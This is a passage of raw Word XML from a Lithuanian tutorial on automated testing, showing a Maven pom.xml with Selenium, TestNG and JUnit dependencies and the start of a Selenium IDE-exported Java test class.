    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00300094">
        <w:t>pom.xml failo pavyzdys (pridėjus priklausomybes po pį sudiegimo):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300094" w:rsidRPr="00300094" w:rsidRDefault="00300094" w:rsidP="00372B3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1"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="522" w:name="_Toc14392714"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</w:t>
            </w:r>
            <w:bookmarkEnd w:id="52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3" w:name="_Toc14392715"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="52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4" w:name="_Toc14392716"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="524"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pP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5" w:name="_Toc14392717"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;groupId&gt;com.automation.qa&lt;/groupId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="52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6" w:name="_Toc14392718"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;artifactId&gt;TestProject&lt;/artifactId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="52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7" w:name="_Toc14392719"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;version&gt;0.0.1-SNAPSHOT&lt;/version&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="52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8" w:name="_Toc14392720"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;packaging&gt;jar&lt;/packaging&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="528"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pP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29" w:name="_Toc14392721"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;name&gt;TestProject&lt;/name&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="52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30" w:name="_Toc14392722"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;url&gt;http://maven.apache.org&lt;/url&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="530"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pP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31" w:name="_Toc14392723"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;properties&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="53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32" w:name="_Toc14392724"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;project.build.sourceEncoding&gt;UTF-8&lt;/project.build.sourceEncoding&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="53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33" w:name="_Toc14392725"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/properties&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="533"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pP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534" w:name="_Toc14392726"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;dependencies&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="53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35" w:name="_Toc14392727"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="53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36" w:name="_Toc14392728"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;groupId&gt;junit&lt;/groupId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="53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37" w:name="_Toc14392729"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;artifactId&gt;junit&lt;/artifactId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="53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38" w:name="_Toc14392730"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;version&gt;3.8.1&lt;/version&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="53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39" w:name="_Toc14392731"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;scope&gt;test&lt;/scope&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="53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40" w:name="_Toc14392732"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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41" w:name="_Toc14392733"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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2" w:name="_Toc14392734"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;groupId&gt;org.seleniumhq.selenium&lt;/groupId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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3" w:name="_Toc14392735"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;artifactId&gt;selenium-java&lt;/artifactId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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4" w:name="_Toc14392736"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;version&gt;2.53.1&lt;/version&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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45" w:name="_Toc14392737"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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46" w:name="_Toc14392738"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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7" w:name="_Toc14392739"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;groupId&gt;org.testng&lt;/groupId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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8" w:name="_Toc14392740"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;artifactId&gt;testng&lt;/artifactId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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49" w:name="_Toc14392741"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;version&gt;6.8&lt;/version&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="54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0" w:name="_Toc14392742"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;scope&gt;test&lt;/scope&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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51" w:name="_Toc14392743"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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52" w:name="_Toc14392744"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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3" w:name="_Toc14392745"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;groupId&gt;org.hamcrest&lt;/groupId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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4" w:name="_Toc14392746"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;artifactId&gt;hamcrest-all&lt;/artifactId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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5" w:name="_Toc14392747"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;version&gt;1.3&lt;/version&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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56" w:name="_Toc14392748"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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57" w:name="_Toc14392749"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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8" w:name="_Toc14392750"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;groupId&gt;com.javaforge.scriptella&lt;/groupId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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59" w:name="_Toc14392751"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;artifactId&gt;scriptella-drivers&lt;/artifactId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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0" w:name="_Toc14392752"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;version&gt;1.1&lt;/version&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="56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61" w:name="_Toc14392753"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="56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62" w:name="_Toc14392754"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="56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3" w:name="_Toc14392755"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;groupId&gt;mysql&lt;/groupId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="56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4" w:name="_Toc14392756"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;artifactId&gt;mysql-connector-java&lt;/artifactId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="56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5" w:name="_Toc14392757"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;version&gt;5.1.26&lt;/version&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="56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66" w:name="_Toc14392758"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="56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67" w:name="_Toc14392759"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="56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8" w:name="_Toc14392760"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;groupId&gt;org.apache.commons&lt;/groupId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="56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69" w:name="_Toc14392761"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;artifactId&gt;commons-io&lt;/artifactId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="56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70" w:name="_Toc14392762"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;version&gt;1.3.2&lt;/version&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="57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71" w:name="_Toc14392763"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="57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72" w:name="_Toc14392764"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="57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73" w:name="_Toc14392765"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;groupId&gt;com.thoughtworks.xstream&lt;/groupId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="57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74" w:name="_Toc14392766"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;artifactId&gt;xstream&lt;/artifactId&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="57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575" w:name="_Toc14392767"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;version&gt;1.4.9&lt;/version&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="57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576" w:name="_Toc14392768"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/dependency&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="57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lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="577" w:name="_Toc14392769"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/dependencies&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="577"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="578" w:name="_Toc14392770"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/project&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="578"/>
          </w:p>
          <w:p w:rsidR="000E5A3D" w:rsidRPr="00AD4464" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pP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7209B3" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>AUTOMATINIŲ TESTŲ KŪRIMO PAGRINDAI</w:t>
      </w:r>
      <w:r w:rsidR="007F235C">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 (kodas eksportuotas iš SeleniumIDE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F235C" w:rsidRPr="00AD4464" w:rsidRDefault="007F235C"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579" w:name="_Toc14392771"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public class TestAddProductToCart {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="57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0" w:name="_Toc14392772"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private WebDriver driver;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="58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1" w:name="_Toc14392773"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private Map&lt;String, Object&gt; vars;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="58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2" w:name="_Toc14392774"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>JavascriptExecutor js;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="58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3" w:name="_Toc14392775"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Before</w:t>
            </w:r>
            <w:bookmarkEnd w:id="58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4" w:name="_Toc14392776"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void setUp() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="58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5" w:name="_Toc14392777"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver = new FirefoxDriver();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="58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6" w:name="_Toc14392778"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>js = (JavascriptExecutor) driver;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="58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7" w:name="_Toc14392779"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>vars = new HashMap&lt;String, Object&gt;();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="58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8" w:name="_Toc14392780"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="58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89" w:name="_Toc14392781"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@After</w:t>
            </w:r>
            <w:bookmarkEnd w:id="58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0" w:name="_Toc14392782"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void tearDown() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="59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1" w:name="_Toc14392783"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
